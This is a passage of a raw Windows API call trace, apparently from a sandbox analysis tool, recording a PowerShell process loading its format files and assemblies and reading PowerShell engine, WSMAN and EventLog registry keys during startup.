lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27ced64 | out: lpFileInformation=0x27ced64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0026.952] GetLastError () returned 0x0 [0026.952] SetErrorMode (uMode=0x1) returned 0x1 [0026.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0026.952] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce368 | out: phkResult=0x1ce368*=0x2f8) returned 0x0 [0026.952] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x0, lpcbData=0x1ce3ac*=0x0 | out: lpType=0x1ce3b0*=0x1, lpData=0x0, lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.952] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x2b64c0, lpcbData=0x1ce3ac*=0x56 | out: lpType=0x1ce3b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.952] RegCloseKey (hKey=0x2f8) returned 0x0 [0026.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0026.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0026.953] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xf51b46d2, Data2=0xe5f2, Data3=0x48bb, Data4=([0]=0xb3, [1]=0x64, [2]=0x26, [3]=0xbf, [4]=0x7d, [5]=0x78, [6]=0x66, [7]=0x62))) returned 0x0 [0026.953] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x23d737c5, Data2=0xe06b, Data3=0x4551, Data4=([0]=0x88, [1]=0x75, [2]=0xb1, [3]=0x8c, [4]=0xb9, [5]=0xe4, [6]=0x77, [7]=0x45))) returned 0x0 [0026.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cde7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0026.954] SetErrorMode (uMode=0x1) returned 0x1 [0026.954] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0026.954] GetLastError () returned 0x0 [0026.954] GetFileType (hFile=0x2f8) returned 0x1 [0026.954] SetErrorMode (uMode=0x1) returned 0x1 [0026.954] GetFileType (hFile=0x2f8) returned 0x1 [0026.954] ReadFile (in: hFile=0x2f8, lpBuffer=0x27e4c74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x27e4c74*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.956] GetLastError () returned 0x0 [0026.956] ReadFile (in: hFile=0x2f8, lpBuffer=0x27e4c74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x27e4c74*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.956] GetLastError () returned 0x0 [0026.957] ReadFile (in: hFile=0x2f8, lpBuffer=0x27e4c74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x27e4c74*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.957] GetLastError () returned 0x0 [0026.957] ReadFile (in: hFile=0x2f8, lpBuffer=0x27e4c74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x27e4c74*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.957] GetLastError () returned 0x0 [0026.957] ReadFile (in: hFile=0x2f8, lpBuffer=0x27e4c74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x27e4c74*, lpNumberOfBytesRead=0x1ce3e4*=0xe98, lpOverlapped=0x0) returned 1 [0026.957] GetLastError () returned 0x0 [0026.957] ReadFile (in: hFile=0x2f8, lpBuffer=0x27e42ac, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x27e42ac*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.957] GetLastError () returned 0x0 [0026.958] ReadFile (in: hFile=0x2f8, lpBuffer=0x27e4c74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x27e4c74*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.958] GetLastError () returned 0x0 [0026.958] CloseHandle (hObject=0x2f8) returned 1 [0026.958] GetLastError () returned 0x0 [0026.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0026.958] SetErrorMode (uMode=0x1) returned 0x1 [0026.958] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2805c70 | out: lpFileInformation=0x2805c70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0026.958] GetLastError () returned 0x0 [0026.958] SetErrorMode (uMode=0x1) returned 0x1 [0026.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0026.958] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce368 | out: phkResult=0x1ce368*=0x2f8) returned 0x0 [0026.958] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x0, lpcbData=0x1ce3ac*=0x0 | out: lpType=0x1ce3b0*=0x1, lpData=0x0, lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.958] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x2b64c0, lpcbData=0x1ce3ac*=0x56 | out: lpType=0x1ce3b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.958] RegCloseKey (hKey=0x2f8) returned 0x0 [0026.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0026.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0026.959] VirtualQuery (in: lpAddress=0x1cd0c0, lpBuffer=0x1ce0c0, dwLength=0x1c | out: lpBuffer=0x1ce0c0*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.959] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x5ac5040e, Data2=0x7666, Data3=0x4099, Data4=([0]=0x9f, [1]=0x3b, [2]=0xab, [3]=0x74, [4]=0xa6, [5]=0x58, [6]=0x4f, [7]=0xcd))) returned 0x0 [0026.960] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x729df522, Data2=0x1ab9, Data3=0x46cc, Data4=([0]=0xaa, [1]=0x91, [2]=0x9d, [3]=0x66, [4]=0xf6, [5]=0xe1, [6]=0x96, [7]=0xfb))) returned 0x0 [0026.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0026.978] GetLastError () returned 0x57 [0026.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0026.978] GetLastError () returned 0x57 [0026.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0026.989] GetLastError () returned 0x57 [0026.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0026.990] GetLastError () returned 0x57 [0026.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.993] GetLastError () returned 0x57 [0026.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.993] GetLastError () returned 0x57 [0026.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0026.995] GetLastError () returned 0x57 [0026.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0026.995] GetLastError () returned 0x57 [0026.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0026.997] GetLastError () returned 0x57 [0026.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0026.997] GetLastError () returned 0x57 [0026.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0026.998] GetLastError () returned 0x57 [0026.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0026.998] GetLastError () returned 0x57 [0027.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0027.000] GetLastError () returned 0x57 [0027.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0027.000] GetLastError () returned 0x57 [0027.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.005] GetLastError () returned 0xcb [0027.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.006] GetLastError () returned 0xcb [0027.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.007] GetLastError () returned 0xcb [0027.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.008] GetLastError () returned 0xcb [0027.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.013] GetLastError () returned 0xcb [0027.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.013] GetLastError () returned 0xcb [0027.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.015] GetLastError () returned 0xcb [0027.018] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce45c | out: phkResult=0x1ce45c*=0x2f8) returned 0x0 [0027.020] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ce4ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ce4b0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ce4ac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ce4b0*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.021] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x0, lpValueName=0x2b64c0, lpcchValueName=0x1ce4d4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ce4d4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0027.021] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x1, lpValueName=0x2b64c0, lpcchValueName=0x1ce4d4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ce4d4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0027.021] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x2, lpValueName=0x2b64c0, lpcchValueName=0x1ce4d4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ce4d4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0027.021] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ce4b4, lpData=0x0, lpcbData=0x1ce4b0*=0x0 | out: lpType=0x1ce4b4*=0x1, lpData=0x0, lpcbData=0x1ce4b0*=0x8) returned 0x0 [0027.021] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ce4b4, lpData=0x2b64c0, lpcbData=0x1ce4b0*=0x8 | out: lpType=0x1ce4b4*=0x1, lpData="2.0", lpcbData=0x1ce4b0*=0x8) returned 0x0 [0027.064] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce418 | out: phkResult=0x1ce418*=0x2fc) returned 0x0 [0027.064] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ce468, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ce46c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ce468*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ce46c*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.064] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x2b64c0, lpcchValueName=0x1ce490, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ce490, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0027.064] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x2b64c0, lpcchValueName=0x1ce490, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ce490, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0027.064] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x2b64c0, lpcchValueName=0x1ce490, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ce490, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0027.064] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ce470, lpData=0x0, lpcbData=0x1ce46c*=0x0 | out: lpType=0x1ce470*=0x1, lpData=0x0, lpcbData=0x1ce46c*=0x8) returned 0x0 [0027.064] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ce470, lpData=0x2b64c0, lpcbData=0x1ce46c*=0x8 | out: lpType=0x1ce470*=0x1, lpData="2.0", lpcbData=0x1ce46c*=0x8) returned 0x0 [0027.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.066] GetLastError () returned 0xcb [0027.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.068] GetLastError () returned 0xcb [0027.074] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce3d8 | out: phkResult=0x1ce3d8*=0x300) returned 0x0 [0027.074] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ce440, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ce43c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ce440*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ce43c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.075] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x0, lpName=0x2b64c0, lpcchName=0x1ce45c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ce45c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.075] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x1, lpName=0x2b64c0, lpcchName=0x1ce45c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ce45c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.075] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x2, lpName=0x2b64c0, lpcchName=0x1ce45c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ce45c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.075] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x3, lpName=0x2b64c0, lpcchName=0x1ce45c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ce45c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.075] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x4, lpName=0x2b64c0, lpcchName=0x1ce45c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ce45c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.076] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x5, lpName=0x2b64c0, lpcchName=0x1ce45c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ce45c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.076] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x6, lpName=0x2b64c0, lpcchName=0x1ce45c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ce45c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.076] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x7, lpName=0x2b64c0, lpcchName=0x1ce45c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ce45c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.076] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x8, lpName=0x2b64c0, lpcchName=0x1ce45c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ce45c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0027.076] 